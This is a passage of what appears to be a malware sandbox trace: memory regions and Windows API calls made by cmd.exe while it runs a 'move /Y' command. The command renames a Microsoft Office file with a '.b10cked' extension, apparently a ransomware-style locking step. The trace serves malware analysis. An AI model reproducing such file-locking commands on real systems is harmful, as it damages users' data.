"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23776 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23777 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23778 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23779 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23780 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 23781 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23782 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23783 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 23784 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 23785 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 23786 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 23787 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 23788 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 23789 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Thread: id = 404 os_tid = 0xa74 [0173.665] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff44 | out: lpSystemTimeAsFileTime=0x12ff44*(dwLowDateTime=0x9d686c00, dwHighDateTime=0x1d440a9)) [0173.665] GetCurrentProcessId () returned 0xac0 [0173.665] GetCurrentThreadId () returned 0xa74 [0173.665] GetTickCount () returned 0x328d4 [0173.665] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff3c | out: lpPerformanceCount=0x12ff3c*=23045459962) returned 1 [0173.666] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0173.666] __set_app_type (_Type=0x1) [0173.666] __p__fmode () returned 0x76b331f4 [0173.666] __p__commode () returned 0x76b331fc [0173.666] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0173.666] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0173.666] GetCurrentThreadId () returned 0xa74 [0173.666] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa74) returned 0x38 [0173.666] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.667] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0173.667] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.667] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0173.667] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fed4 | out: phkResult=0x12fed4*=0x0) returned 0x2 [0173.667] VirtualQuery (in: lpAddress=0x12ff0b, lpBuffer=0x12fea4, dwLength=0x1c | out: lpBuffer=0x12fea4*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.667] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fea4, dwLength=0x1c | out: lpBuffer=0x12fea4*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0173.667] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fea4, dwLength=0x1c | out: lpBuffer=0x12fea4*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0173.667] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fea4, dwLength=0x1c | out: lpBuffer=0x12fea4*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.667] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fea4, dwLength=0x1c | out: lpBuffer=0x12fea4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0173.667] GetConsoleOutputCP () returned 0x1b5 [0173.667] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.667] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0173.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.667] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0173.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.667] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.668] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.668] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.668] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.668] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.668] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.668] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0173.668] GetEnvironmentStringsW () returned 0x1b0210* [0173.668] FreeEnvironmentStringsW (penv=0x1b0210) returned 1 [0173.668] GetEnvironmentStringsW () returned 0x1b0210* [0173.669] FreeEnvironmentStringsW (penv=0x1b0210) returned 1 [0173.669] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ee44 | out: phkResult=0x12ee44*=0x40) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x0, lpData=0x12ee50*=0xa0, lpcbData=0x12ee48*=0x1000) returned 0x2 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x1, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x0, lpData=0x12ee50*=0x1, lpcbData=0x12ee48*=0x1000) returned 0x2 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x0, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x40, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x40, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x0, lpData=0x12ee50*=0x40, lpcbData=0x12ee48*=0x1000) returned 0x2 [0173.669] RegCloseKey (hKey=0x40) returned 0x0 [0173.669] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ee44 | out: phkResult=0x12ee44*=0x40) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x0, lpData=0x12ee50*=0x40, lpcbData=0x12ee48*=0x1000) returned 0x2 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x1, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x0, lpData=0x12ee50*=0x1, lpcbData=0x12ee48*=0x1000) returned 0x2 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x0, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x9, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x9, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x0, lpData=0x12ee50*=0x9, lpcbData=0x12ee48*=0x1000) returned 0x2 [0173.669] RegCloseKey (hKey=0x40) returned 0x0 [0173.669] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886389 [0173.669] srand (_Seed=0x5b886389) [0173.669] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked\"" [0173.669] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked\"" [0173.670] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.670] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0173.670] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0173.670] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0173.670] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.670] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0173.670] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0173.670] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0173.670] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0173.670] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0173.670] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0173.670] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0173.670] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0173.670] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0173.670] GetEnvironmentStringsW () returned 0x1b2360* [0173.671] FreeEnvironmentStringsW (penv=0x1b2360) returned 1 [0173.671] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.671] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.671] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0173.671] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0173.671] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0173.671] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0173.671] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0173.671] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0173.671] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0173.671] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0173.671] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12fc10 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.671] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12fc10, lpFilePart=0x12fc0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12fc0c*="Desktop") returned 0x18 [0173.671] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.671] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f98c | out: lpFindFileData=0x12f98c) returned 0x1b09f0 [0173.671] FindClose (in: hFindFile=0x1b09f0 | out: hFindFile=0x1b09f0) returned 1 [0173.671] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f98c | out: lpFindFileData=0x12f98c) returned 0x1b09f0 [0173.672] FindClose (in: hFindFile=0x1b09f0 | out: hFindFile=0x1b09f0) returned 1 [0173.672] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f98c | out: lpFindFileData=0x12f98c) returned 0x1b09f0 [0173.672] FindClose (in: hFindFile=0x1b09f0 | out: hFindFile=0x1b09f0) returned 1 [0173.672] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.672] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0173.672] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0173.672] GetEnvironmentStringsW () returned 0x1b0210* [0173.672] FreeEnvironmentStringsW (penv=0x1b0210) returned 1 [0173.672] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.673] GetConsoleOutputCP () returned 0x1b5 [0173.673] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.673] GetUserDefaultLCID () returned 0x409 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fd50, cchData=128 | out: lpLCData="0") returned 2 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fd50, cchData=128 | out: lpLCData="0") returned 2 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fd50, cchData=128 | out: lpLCData="1") returned 2 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0173.674] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0173.674] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0173.674] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0173.674] GetConsoleTitleW (in: lpConsoleTitle=0x1a0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.674] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.675] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0173.675] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0173.675] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0173.675] _wcsicmp (_String1="move", _String2=")") returned 68 [0173.675] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0173.675] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0173.675] _wcsicmp (_String1="IF", _String2="move") returned -4 [0173.675] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0173.675] _wcsicmp (_String1="REM", _String2="move") returned 5 [0173.675] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0173.680] GetConsoleTitleW (in: lpConsoleTitle=0x12fa48, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.680] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0173.680] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0173.680] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0173.680] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0173.680] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0173.680] _wcsicmp (_String1="move", _String2="CD") returned 10 [0173.680] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0173.680] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0173.680] _wcsicmp (_String1="move", _String2="REN") returned -5 [0173.680] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0173.680] _wcsicmp (_String1="move", _String2="SET") returned -6 [0173.680] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0173.680] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0173.680] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0173.680] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0173.680] _wcsicmp (_String1="move", _String2="MD") returned 11 [0173.680] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0173.680] _wcsicmp (_String1="move", _String2="RD") returned -5 [0173.680] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0173.680] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0173.681] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0173.681] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0173.681] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0173.681] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0173.681] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0173.681] _wcsicmp (_String1="move", _String2="VER") returned -9 [0173.681] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0173.681] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0173.681] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0173.681] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0173.681] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0173.681] _wcsicmp (_String1="move", _String2="START") returned -6 [0173.681] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0173.681] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0173.681] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0173.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.683] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f804, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f7fc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f7fc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0173.685] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0173.685] _wcsicmp (_String1="STINTL~1.TRX", _String2=".") returned 69 [0173.685] _wcsicmp (_String1="STINTL~1.TRX", _String2="..") returned 69 [0173.685] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\stintl~1.trx")) returned 0x2020 [0173.685] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1b1f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.685] SetErrorMode (uMode=0x0) returned 0x0 [0173.685] SetErrorMode (uMode=0x1) returned 0x0 [0173.686] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x12f18c, lpFilePart=0x12f174 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX", lpFilePart=0x12f174*="STINTL~1.TRX") returned 0x3c [0173.686] SetErrorMode (uMode=0x0) returned 0x1 [0173.686] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0173.686] _wcsicmp (_String1="STINTL~1.TRX", _String2=".") returned 69 [0173.686] _wcsicmp (_String1="STINTL~1.TRX", _String2="..") returned 69 [0173.686] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\stintl~1.trx")) returned 0x2020 [0173.686] SetErrorMode (uMode=0x0) returned 0x0 [0173.686] SetErrorMode (uMode=0x1) 